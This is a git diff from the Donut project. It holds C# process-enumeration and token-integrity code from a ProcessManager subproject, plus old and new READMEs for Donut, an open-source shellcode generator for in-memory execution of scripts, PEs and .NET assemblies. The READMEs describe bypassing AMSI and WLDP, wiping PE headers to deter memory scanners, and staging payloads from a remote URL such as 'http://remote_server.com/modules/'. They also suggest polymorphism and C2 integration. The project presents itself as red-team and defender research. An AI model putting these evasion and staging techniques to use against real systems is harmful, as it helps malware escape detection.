414 //Access was denied, or
415 catch
416 {
417 return null;
418 }
419 }
420
421 /// <summary>
422 /// Gets the parent process of a specified process.
423 /// </summary>
424 /// <param name="handle">The process handle.</param>
425 /// <returns>An instance of the Process class.</returns>
426 public static Process GetParentProcess(IntPtr handle)
427 {
428 ParentProcessUtilities pbi = new ParentProcessUtilities();
429 int returnLength;
430 int status = NtQueryInformationProcess(handle, 0, ref pbi, Marshal.SizeOf(pbi), out returnLength);
431 if (status != 0)
432 throw new Win32Exception(status);
433
434 try
435 {
436 return Process.GetProcessById(pbi.InheritedFromUniqueProcessId.ToInt32());
437 }
438 catch (ArgumentException)
439 {
440 // not found
441 return null;
442 }
443 }
444 }
445
446 /// <summary>
447 /// Inspects the tokens of an arbitrary Process and reports useful information.
448 ///
449 /// This class is almost entirely copied from the example provided by pinvoke.net:
450 /// http://pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
451 /// </summary>
452 public class TokenInspector
453 {
454 [DllImport("advapi32.dll", SetLastError = true)]
455 static extern IntPtr GetSidSubAuthority(IntPtr sid, UInt32 subAuthorityIndex);
456
457 [DllImport("advapi32.dll", SetLastError = true)]
458 static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
459
460 // winnt.h, Windows SDK v6.1
461 const int SECURITY_MANDATORY_UNTRUSTED_RID = (0x00000000);
462 const int SECURITY_MANDATORY_LOW_RID = (0x00001000);
463 const int SECURITY_MANDATORY_MEDIUM_RID = (0x00002000);
464 const int SECURITY_MANDATORY_HIGH_RID = (0x00003000);
465 const int SECURITY_MANDATORY_SYSTEM_RID = (0x00004000);
466 const int SECURITY_MANDATORY_PROTECTED_PROCESS_RID = (0x00005000);
467
468 [DllImport("advapi32.dll", SetLastError = true)]
469 [return: MarshalAs(UnmanagedType.Bool)]
470 static extern bool OpenProcessToken(
471 IntPtr ProcessHandle,
472 UInt32 DesiredAccess,
473 out IntPtr TokenHandle
474 );
475
476 const UInt32 TOKEN_QUERY = 0x0008;
477
478 [DllImport("advapi32.dll", SetLastError = true)]
479 static extern bool GetTokenInformation(
480 IntPtr TokenHandle,
481 TOKEN_INFORMATION_CLASS TokenInformationClass,
482 IntPtr TokenInformation,
483 uint TokenInformationLength,
484 out uint ReturnLength
485 );
486
487 enum TOKEN_INFORMATION_CLASS
488 {
489 TokenUser = 1, TokenGroups, TokenPrivileges, TokenOwner, TokenPrimaryGroup, TokenDefaultDacl, TokenSource, TokenType, TokenImpersonationLevel, TokenStatistics, TokenRestrictedSids, TokenSessionId, TokenGroupsAndPrivileges, TokenSessionReference, TokenSandBoxInert, TokenAuditPolicy, TokenOrigin, TokenElevationType, TokenLinkedToken, TokenElevation, TokenHasRestrictions, TokenAccessInformation, TokenVirtualizationAllowed, TokenVirtualizationEnabled,
490
491 /// <summary>
492 /// The buffer receives a TOKEN_MANDATORY_LABEL structure that specifies the token's integrity level.
493 /// </summary>
494 TokenIntegrityLevel,
495
496 TokenUIAccess, TokenMandatoryPolicy, TokenLogonSid, MaxTokenInfoClass
497 }
498
499 public enum IntegrityLevel
500 {
501 Low, Medium, High, System, None, Unknown
502 }
503
504 const int ERROR_INVALID_PARAMETER = 87;
505
506 [DllImport("kernel32.dll", SetLastError = true)]
507 static extern bool CloseHandle(IntPtr hHandle);
508
509
510 public static IntegrityLevel GetIntegrityLevel(Process process)
511 {
512 try
513 {
514 IntPtr pId = (process.Handle);
515
516 IntPtr hToken = IntPtr.Zero;
517 if (OpenProcessToken(pId, TOKEN_QUERY, out hToken))
518 {
519 try
520 {
521 IntPtr pb = Marshal.AllocCoTaskMem(1000);
522 try
523 {
524 uint cb = 1000;
525 if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
526 {
527 IntPtr pSid = Marshal.ReadIntPtr(pb);
528
529 int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));
530
531 if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
532 {
533 return IntegrityLevel.Low;
534 }
535 else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
536 {
537 // Medium Integrity
538 return IntegrityLevel.Medium;
539 }
540 else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
541 {
542 // High Integrity
543 return IntegrityLevel.High;
544 }
545 else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
546 {
547 // System Integrity
548 return IntegrityLevel.System;
549 }
550 return IntegrityLevel.None;
551 }
552 else
553 {
554 return IntegrityLevel.Unknown;
555 }
556 }
557 finally
558 {
559 Marshal.FreeCoTaskMem(pb);
560 }
561 }
562 finally
563 {
564 CloseHandle(hToken);
565
566 }
567 }
568 }
569 catch (Win32Exception ex)
570 {
571 return IntegrityLevel.Unknown;
572 }
573
574 //If we made it this far through all of the finally blocks and didn't return, then return unknown
575 return IntegrityLevel.Unknown;
576 }
577 }
578 }
+36
-0
ProcessManager/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ProcessManager")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ProcessManager")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("98ca74c7-a074-434d-9772-75896e73ceaa")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+37
-0
ProcessManager/README.md less more
0 # ProcessManager
1
2 Has its own repo at: https://github.com/TheWover/ProcessManager
3
4 ps-like .NET Assembly for enumerating processes on the current machine or a remote machine (using current token). Has the unique feature of telling you whether each process is managed (has the CLR loaded). Compatible with .NET v3.5.
5
6 All enumeration is done with only built-in .NET APIs and PInvoke, rather than any third-party libraries or usage of WMI.
7
8 * PPID value of "-1" means that the parent is no longer running or is not accessible.
9 * Arch value of "*" means that the process could not be accessed or the architecture could not be determined. Usually a permissions issue.
10 * Managed value of "True" means that the CLR is loaded into the process. That is, it is a "managed" process because it is running .NET managed code.
11 * Integrity value of "Unknown" means exactly that.
12 * Blank User value means that the user information of the process could not be obtained.
13
14 **I have not tested ProcessManager's remote enumeration option. :-P Neither me nor Odzhan have a lab setup for testing that. Please feel free to let us know of any issues.**
15
16 ![Alt text](https://github.com/TheWover/ProcessManager/blob/master/img/usage.JPG?raw=true "General Usage")
17
18 # Usage
19
20 ```
21 | Process Manager [v0.2]
22 | Copyright (c) 2019 TheWover
23
24 Usage: ProcessManager.exe [options]
25
26 -h, --help Display this help menu.
27 --machine Specify a machine to query. Machine name or IP Address may be used.
28 --name Filter by a process name.
29
30 Examples:
31
32 ProcessManager.exe
33 ProcessManager.exe --name svchost
34 ProcessManager.exe --machine workstation2
35 ProcessManager.exe --machine 10.30.134.13
36 ```
ProcessManager/img/usage.JPG less more
Binary diff not shown
+322
-253
README.md less more
0 # Using Donut
1
2 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
3
4 Version: 0.9.2 *please submit issues and requests for v1.0 release*
5
6 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
7
8 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
9
10 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
11
12 ## Introduction
13
14 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
15
16 It can be used in several ways.
17
18 ## As a Standalone Tool
19
20 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
21
22 ```
23
24 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
25
26 -MODULE OPTIONS-
27
28 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
29 -u <URL> HTTP server that will host the donut module.
30
31 -PIC/SHELLCODE OPTIONS-
32
33 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
34 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
35 -o <payload> Output file. Default is "payload.bin"
36
37 -DOTNET OPTIONS-
38
39 -c <namespace.class> Optional class name. (required for .NET DLL)
40 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
41 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
42 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
43 -d <name> AppDomain name to create for .NET. Randomly generated by default.
44
45 examples:
46
47 donut -f c2.dll
48 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
49 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
50
51 ```
52
53 ### Building Donut
54
55 Tags have been provided for each release version of donut that contain the compiled executables.
56
57 * v0.9.2, Bear Claw:
58 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
59 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
60 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
61
62 However, you may also clone and build the source yourself using the provided makefiles.
63
64 ## Building From Repository
65
66 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
67
68 ```
69 git clone http://github.com/thewover/donut
70 cd donut
71 ```
72
73 ## Linux
74
75 Simply run make to generate an executable, static and dynamic libraries.
76
77 ```
78 make
79 make clean
80 make debug
81 ```
82
83 ## Windows
84
85 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
86
87 ```
88 nmake -f Makefile.msvc
89 nmake clean -f Makefile.msvc
90 nmake debug -f Makefile.msvc
91 ```
92
93 ## As a Library
94
95 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
96
97 ## As a Python Module
98
99 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
100
101 ```
102 pip install .
103 ```
104
105 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
106
107 ```
108 pip install donut-shellcode
109 ```
110
111 ## As a Template - Rebuilding the shellcode
112
113 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
114
115 ### Microsoft Visual Studio
116
117 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
118
119 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
120
121 ```
122 nmake clean -f Makefile.msvc
123 nmake -f Makefile.msvc
124 ```
125
126 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
127
128 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
129
130 ```
131 nmake clean -f Makefile.msvc
132 nmake x86 -f Makefile.msvc
133 ```
134
135 This will save the shellcode as a C array to *payload_exe_x86.h*.
136
137 ### Mingw-w64
138
139 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
140
141 ```
142 make clean -f Makefile.mingw
143 make -f Makefile.mingw
144 ```
145
146 Once you've recompiled for all architectures, you may rebuild donut.
147
148 ## Bypasses
149
150 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
151
152 * AMSI in .NET v4.8
153 * Device Guard policy preventing dynamicly generated code from executing
154
155 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
156
157 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
158
159 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
160
161 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
162
163 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
164
165 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
166
167 ### Additional features.
168
169 These are left as exercises to the reader. I would personally recommend:
170
171 * Add environmental keying
172 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
173 * Integrate donut as a module into your favorite RAT/C2 Framework
174
175 ## Disclaimers
176
177 * No, we will not update donut to counter signatures or detections by any AV.
178 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
179
180 # How it works
181
182 ## Procedure for Assemblies
183
184 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
185
186 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
187
188 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
189
190 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
191
192 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
193
194 ## Procedure for ActiveScript/XSL
195
196 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
197
198 ## Procedure for PE Loading
199
200 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
201
202 ## Components
203
204 Donut contains the following elements:
205
206 * donut.c: The source code for the donut payload generator
207 * donut.exe: The compiled payload generator as an EXE
208 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
209 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
210 * setup.py: The setup file for installing Donut as a Pip Python3 module.
211 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
212 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
213 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
214 * payload/payload.c: Main file for the shellcode.
215 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
216 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
217 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
218 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
219 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
220 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
221 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
222 * payload/http_client.c: Downloads a module from remote staging server into memory.
223 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
224 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
225 * payload/inject.exe: The compiled C shellcode injector
226 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
227 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
228 * payload/runsc.exe: The compiled C shellcode runner
229 * payload/exe2h/exe2h.c: Source code for exe2h
230 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
231 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
232 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
233
234 # Subprojects
235
236 There are three companion projects provided with donut:
237
238 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
239 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
240 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
241 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
242
243 # Project plan
244
245 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
246 * Create a C# version of the generator.
247 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
248 * Add support for HTTP proxies.
249 ~~* Find ways to simplify the shellcode if possible.~~
250 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
251 * ~~Dynamic Calls to DLL functions.~~
252 * Handle the ProcessExit event from AppDomain using unmanaged code.
0 [![Issues](https://img.shields.io/github/issues/thewover/donut)](https://github.com/TheWover/donut/issues)
1 [![Contributors](https://img.shields.io/github/contributors/thewover/donut)](https://github.com/TheWover/donut/graphs/contributors)
2 [![Stars](https://img.shields.io/github/stars/thewover/donut)](https://github.com/TheWover/donut/stargazers)
3 [![Forks](https://img.shields.io/github/forks/thewover/donut)](https://github.com/TheWover/donut/network/members)
4 [![License](https://img.shields.io/github/license/thewover/donut)](https://github.com/TheWover/donut/blob/master/LICENSE)
5 [![Chat](https://img.shields.io/badge/chat-%23donut-orange)](https://bloodhoundgang.herokuapp.com/)
6 [![Github All Releases](https://img.shields.io/github/downloads/thewover/donut/total.svg)](http://www.somsubhra.com/github-release-stats/?username=thewover&repository=donut)
7 [![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https://github.com/TheWover/donut&text=%23Donut+An+open-source+shellcode+generator+that+supports+in%2Dmemory+execution+of+VBS%2FJS%2FEXE%2FDLL+files:+https://github.com/TheWover/donut)
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut_logo_white.jpg?raw=true "Donut Logo")
10
11 <p>Current version: <a href="https://thewover.github.io/TBD/">v0.9.3</a> <em>please submit issues and requests for v1.0 release</em></p>
12
13 <h2>Table of contents</h2>
14
15 <ol>
16 <li><a href="#intro">Introduction</a></li>
17 <li><a href="#how">How It Works</a></li>
18 <li><a href="#build">Building</a></li>
19 <li><a href="#usage">Usage</a></li>
20 <li><a href="#subproj">Subprojects</a></li>
21 <li><a href="#dev">Developing with Donut</a></li>
22 <li><a href="#qad">Questions and Discussions</a></li>
23 <li><a href="#disclaimer">Disclaimer</a></li>
24 </ol>
25
26 <h2 id="intro">1. Introduction</h2>
27
28 <p><strong>Donut</strong> is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself. The module is optionally encrypted using the <a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a> block cipher and a 128-bit randomly generated key. After the file is loaded and executed in memory, the original reference is erased to deter memory scanners. The generator and loader support the following features:</p>
29
30 <ul>
31 <li>Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.</li>
32 <li>Using entropy for API hashes and generation of strings.</li>
33 <li>128-bit symmetric encryption of files.</li>
34 <li>Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).</li>
35 <li>Patching command line for EXE files.</li>
36 <li>Patching exit-related API to avoid termination of host process.</li>
37 <li>Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal.</li>
38 </ul>
39
40 <p>There are dynamic and static libraries for both Linux and Windows that can be integrated into your own projects. There's also a python module which you can read more about in <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
41
42 <h2 id="how">2. How It Works</h2>
43
44 <p>Donut contains individual loaders for each supported file type. For dotNET EXE/DLL assemblies, Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. Once the CLR is loaded into the host process, a new Application Domain is created to allow for running Assemblies in disposable AppDomains. When the AppDomain is ready, the dotNET Assembly is loaded via the AppDomain.Load_3 method. Finally, the Entry Point for EXEs or public method for DLLs specified by the user is invoked with any additional parameters. Refer to MSDN for documentation on the <a href=" https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces">Unmanaged CLR Hosting API.</a> For a standalone example of a CLR Host, refer to <a href="https://github.com/TheWover/donut/blob/master/DonutTest/rundotnet.cpp">code here.</a></p>
45
46 <p>VBScript and JScript files are executed using the IActiveScript interface. There's also minimal support for some of the methods provided by the Windows Script Host (wscript/cscript). For a standalone example, refer to <a href="https://gist.github.com/odzhan/d18145b9538a3653be2f9a580b53b063">code here.</a> For a more detailed description, read: <a href="https://modexp.wordpress.com/2019/07/21/inmem-exec-script/">In-Memory Execution of JavaScript, VBScript, JScript and XSL</a></p>
47
48 <p>Unmanaged or native EXE/DLL files are executed using a custom PE loader with support for Delayed Imports, TLS and patching the command line. Only files with relocation information are supported. Read <a href="https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/">In-Memory Execution of DLL</a> for more information.</p>
49
50 <p>The loader can disable AMSI and WLDP to help evade detection of malicious files executed in-memory. For more information, read <a href="https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/">How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code</a>. It also supports decompression of files in memory using aPLib or the RtlDecompressBuffer API. Read <a href="https://modexp.wordpress.com/2019/12/08/shellcode-compression/">Data Compression</a> for more information.</p>
51
52 <p>By default, the loader will overwrite the PE headers of unmanaged PEs (from the base address to `IMAGE_OPTIONAL_HEADER.SizeOfHeaders`). If no decoy module is used (module overloading), then the PE headers will be zeroed. If a decoy module is used, the PE headers of the decoy module will be used to overwrite those of the payload module. This is to deter detection by comparing the PE headers of modules in memory with the file backing them on disk. The user may request that all PE headers be preserved in their original state. This is helpful for scenarios when the payload module needs to access its PE headers, such as when looking up embedded PE resources.</p>
53
54 <p>For a detailed walkthrough using the generator and how Donut affects tradecraft, read <a href="https://thewover.github.io/Introducing-Donut/">Donut - Injecting .NET Assemblies as Shellcode</a>. For more information about the loader, read <a href="https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/">Loading .NET Assemblies From Memory</a>.</p>
55
56 <p>Those who wish to know more about the internals should refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">Developer notes.</a></p>
57
58 <h2 id="build">3. Building</h2>
59
60 <p>There are two types of build. If you want to debug Donut, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">documentation here</a>. If not, continue reading for the release build.</p>
61
62 <h3><strong>Clone</strong></h3>
63
64 <p>From a Windows command prompt or Linux terminal, clone the repository.</p>
65
66 <pre>
67 git clone http://github.com/thewover/donut.git
68 </pre>
69
70 <p>The next step depends on your operating system and what compiler you decide to use. Currently, the generator and loader template for Donut can be compiled successfully with both Microsoft Visual Studio 2019 (Native Tools Command Prompt for VS 2019) and MingGW-64. To use the libraries in your own C/C++ project, please refer to the <a href="https://github.com/TheWover/donut/tree/master/examples">examples provided here.</a></p>
71
72 <h4><strong>Windows</strong></h4>
73
74 <p>To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p>
75
76 <pre>
77 nmake -f Makefile.msvc
78 </pre>
79
80 <p>To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p>
81
82 <pre>
83 make -f Makefile.mingw
84 </pre>
85
86 <h4><strong>Linux</strong></h4>
87
88 <p>To generate the dynamic library donut.so, the static library donut.a and the generator donut. Change to the directory where you cloned the Donut repository and simply type make.</p>
89
90 <h3>Python Module</h3>
91
92 <p>Donut can be installed and used as a Python module. To install from source requires pip for Python3. First, ensure older versions of donut-shellcode are not installed by issuing the following command on Linux terminal or Microsoft Visual Studio command prompt.</p>
93
94 <pre>
95 pip3 uninstall donut-shellcode
96 </pre>
97
98 <p>After you confirm older versions are no longer installed, issue the following command.</p>
99
100 <pre>
101 pip3 install .
102 </pre>
103
104 <p>You may also install Donut as a Python module by grabbing it from the PyPi repository.</p>
105
106 <pre>
107 pip3 install donut-shellcode
108 </pre>
109
110 <p>For more information, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
111
112 <h3>Releases</h3>
113
114 <p>Tags have been provided for each release version of Donut that contain the compiled executables.</p>
115
116 <ul>
117 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.3">v0.9.3, TBD</a></li>
118 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.2">v0.9.2, Bear Claw</a></li>
119 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.1">v0.9.1, Apple Fritter</a></li>
120 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9">v0.9.0, Initial Release</a></li>
121 </ul>
122
123 <p>Currently, there are two other generators available.</p>
124
125 <ul>
126 <li><a href="https://github.com/n1xbyte/donutCS">C# generator by n1xbyte</a></li>
127 <li><a href="https://github.com/Binject/go-donut">Go generator by awgh</a></li>
128 </ul>
129
130 <h2 id="usage">4. Usage</h2>
131
132 <p>The following table lists switches supported by the command line version of the generator.</p>
133
134 <table border="1">
135 <tr>
136 <th>Switch</th>
137 <th>Argument</th>
138 <th>Description</th>
139 </tr>
140
141 <tr>
142 <td><strong>-a</strong></td>
143 <td><var>arch</var></td>
144 <td>Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).</td>
145 </tr>
146
147 <tr>
148 <td><strong>-b</strong></td>
149 <td><var>level</var></td>
150 <td>Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)</td>
151 </tr>
152
153 <tr>
154 <td><strong>-k</strong></td>
155 <td><var>headers</var></td>
156 <td>Preserve PE headers. 1=Overwrite (default), 2=Keep all</td>
157 </tr>
158
159 <tr>
160 <td><strong>-c</strong></td>
161 <td><var>class</var></td>
162 <td>Optional class name. (required for .NET DLL) Can also include namespace: e.g <em>namespace.class</em></td>
163 </tr>
164
165 <tr>
166 <td><strong>-d</strong></td>
167 <td><var>name</var></td>
168 <td>AppDomain name to create for .NET. If entropy is enabled, one will be generated randomly.</td>
169 </tr>
170
171 <tr>
172 <td><strong>-e</strong></td>
173 <td><var>level</var></td>
174 <td>Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default)</td>
175 </tr>
176
177 <tr>
178 <td><strong>-f</strong></td>
179 <td><var>format</var></td>
180 <td>The output format of loader saved to file. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal</td>
181 </tr>
182
183 <tr>
184 <td><strong>-m</strong></td>
185 <td><var>name</var></td>
186 <td>Optional method or function for DLL. (a method is required for .NET DLL)</td>
187 </tr>
188
189 <tr>
190 <td><strong>-n</strong></td>
